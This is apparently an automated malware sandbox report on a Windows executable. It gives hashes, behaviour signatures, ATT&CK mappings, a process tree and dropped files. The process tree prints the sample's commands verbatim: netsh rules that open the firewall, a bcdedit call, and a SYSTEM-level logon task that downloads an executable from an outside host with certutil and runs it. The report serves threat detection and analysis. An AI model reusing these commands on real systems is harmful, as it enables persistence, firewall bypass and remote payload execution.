40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2

General

Target

40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
Size

3.8MB
MD5

900302a2aa483020ee88f0bc7547baf1
SHA1

413d13f3ed8f330384b9354291cec2efa335342f
SHA256

40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2
SHA512

556e6c523ba9be1ce39147f34d4859b45cacc9cb2e2ffce5ca90a7eafd821d7ec0d06be7529e6853f445b1acc80d842b987f896f748830ebf8a4d58fb0ec73d4

Score

10^/10

evasion

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 2988 created 3104 2988 svchost.exe 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

3544 bcdedit.exe

description	pid	process	target process
PID 2988 created 3104	2988	svchost.exe	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe

pid	process
3544	bcdedit.exe

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	process	target process
3464	3104	WerFault.exe	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
864	4364	WerFault.exe	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1596 schtasks.exe
4544 schtasks.exe

pid	process
1596	schtasks.exe
4544	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe

pid	process
3104	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
3104	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
4364	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
4364	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3104	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
Token: SeImpersonatePrivilege	3104	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
Token: SeTcbPrivilege	2988	svchost.exe
Token: SeTcbPrivilege	2988	svchost.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 2988 wrote to memory of 4364	2988	svchost.exe	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
PID 2988 wrote to memory of 4364	2988	svchost.exe	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
PID 2988 wrote to memory of 4364	2988	svchost.exe	40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe

C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
"C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
"C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:3620

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
3⤵
PID:4508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 676
3⤵
- Program crash
PID:864

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:2592

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1596

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:4544

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:3788

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 880
2⤵
- Program crash
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3104 -ip 3104
1⤵
PID:4772

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
1⤵
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4364 -ip 4364
1⤵
PID:4528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.6MB

MD5
3ec1b10862b9d136145adfada8b8e209

SHA1
38ccaeb776d11692a52906469b22d287a3ca55a2

SHA256
edfbf81cfb2525e5d47ea72b17640e4d80a55ee604394f3442c87241d417c4c4

SHA512
f454100d2564ca43be78f37ee36ad830dbeb7215770c865785a64053bcfb5634b112782eecfb70c21cec3ce82b5100f477929bbeac7578e3d31bcbbe530bf46b

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.6MB

MD5
ed616af4c080b62fb6a36b40b5606c7d

SHA1
9df7fee4983396769d23ce468bb63c9e691806a8

SHA256
9edf27690b361e6470a65717e88f8665e561bc1345f89dc5d7d1b7d8bb543d8d

SHA512
ecc9f144eadb8abd917c3f75abc7065495270a32010e389b675c3313b94185196d1daca81f1473b48f27f546bee9cd1ff5de5d6bd6da88c839a75870ff4f8bcb

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.5MB

MD5
61ecf4f4abeacd59e6888688559218de

SHA1
6ee1ea6e53e2e06747444cea94e33a72f2c6b80c

SHA256
641a41b15724aeff9e7c341c9bdf4d167337c9b8936c186ba7bd6c428be7d7ae

SHA512
0a5d68ada05ece2155e40e194e8c8995058f0291efb5ac1ec18091063ec29cbf436e4550b00bc5c36183c4a0a8bc09a750eed545ef8500b559f87a76da39f909

Download Submit
memory/1596-144-0x0000000000000000-mapping.dmp

Download
memory/2592-145-0x0000000001400000-0x00000000017A6000-memory.dmp

Filesize
3.6MB

Download
memory/2592-146-0x0000000000400000-0x0000000000BFD000-memory.dmp

Filesize
8.0MB

Download
memory/2592-140-0x0000000000000000-mapping.dmp

Download
memory/3104-132-0x0000000000400000-0x0000000000BFD000-memory.dmp

Filesize
8.0MB

Download
memory/3104-131-0x00000000012D0000-0x00000000019C5000-memory.dmp

Filesize
7.0MB

Download
memory/3104-130-0x0000000000F1E000-0x00000000012C4000-memory.dmp

Filesize
3.6MB

Download
memory/3544-149-0x0000000000000000-mapping.dmp

Download
memory/3620-134-0x0000000000000000-mapping.dmp

Download
memory/3788-147-0x0000000000000000-mapping.dmp

Download
memory/4364-136-0x000000000104D000-0x00000000013F3000-memory.dmp

Filesize
3.6MB

Download
memory/4364-137-0x0000000000400000-0x0000000000BFD000-memory.dmp

Filesize
8.0MB

Download
memory/4364-133-0x0000000000000000-mapping.dmp

Download
memory/4508-138-0x0000000000000000-mapping.dmp

Download
memory/4544-143-0x0000000000000000-mapping.dmp

Download
memory/4844-135-0x0000000000000000-mapping.dmp

Download
memory/4888-139-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads